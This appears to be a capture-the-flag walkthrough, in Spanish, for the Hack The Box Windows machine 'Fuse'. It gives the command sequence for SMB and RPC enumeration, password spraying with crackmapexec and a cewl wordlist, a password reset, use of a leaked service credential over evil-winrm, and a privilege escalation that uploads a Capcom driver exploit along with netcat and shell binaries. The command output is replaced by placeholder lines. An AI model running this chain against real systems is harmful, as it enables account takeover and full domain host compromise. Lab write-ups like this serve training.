Fuse

Fuse


HTB Windows

nmap -A -p- -oA fuse 10.129.2.5 —min-rate=10000 —script=vuln —script-timeout=15 -v

ssh_command.

nmap -sC -sV -O -p- -oA fuse 10.129.2.5

nmap -sU -O -p- -oA active-udp 10.129.2.5

nikto -h 10.129.2.5:80

ssh_command.

crackmapexec smb 10.129.2.5

smbclient -L 10.129.2.5 -N

ssh_command.

rpcclient -U "" 10.129.2.5 -N

enumdomusers

ssh_command.

whatweb http://10.129.2.5

Vamos a etc/hosts y agregamos fuse.fabricorp.local

ssh_command.

whatweb http://10.129.2.5

ssh_command.

Nos dirigimos a http://fuse.fabricorp.local

ssh_command.

Creamos un archivo y ponesmo los usuarios que encontramos en la pagina.

crackmapexec smb 10.129.2.5 -u users.txt -p users.txt

ssh_command.

cewl -w passwords http://fuse.fabricorp.local/papercut/logs/html/index.htm —with-numbers

cat passwords

ssh_command.

crackmapexec smb 10.129.2.5 -u users.txt -p passwords —continue-on-success | grep -v -i “failure”

ssh_command.

smbpasswd -r 10.129.2.5 -U “bhult”

Creamos una contrasena nueva

ssh_command.

crackmapexec smb 10.129.2.5 -u “bhult” -p “cu3rv0x123$”

ssh_command.

rpcclient -U “bhult%cu3rv0x123$1” 10.129.2.5

Lo tienes que hacer rapido.

ssh_command.

enumdomprinters

ssh_command.

Adquirimos los usuarios y los metemos en un archivo

ssh_command.

crackmapexec smb 10.129.2.5 -u users -p “fab@s3Rv1ce$1”

ssh_command.

crackmapexec winrm 10.129.2.5 -u “svc-print” -p “fab@s3Rv1ce$1”

ssh_command.

evil-winrm -i 10.129.2.5 -u “svc-print” -p “fab@s3Rv1ce$1”

ssh_command.

whoami /priv

ssh_command.

whoami /all

ssh_command.

ssh_command.

https://github.com/mach1el/htb-scripts/tree/master/exploit-fuse

ssh_command.

Hacemos un upload a todos los archivos incluyendo nc.exe

mkdir C:\temp

cd temp

ssh_command.

upload EOPLOADDRIVER.exe

upload ExploitCapcom_modded.exe

upload nc.exe

upload netcat.bat

upload shell.exe

ssh_command.

.\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys

.\ExploitCapcom_modded.exe

ssh_command.

whoami

ssh_command.

© 2025 Cu3rv0x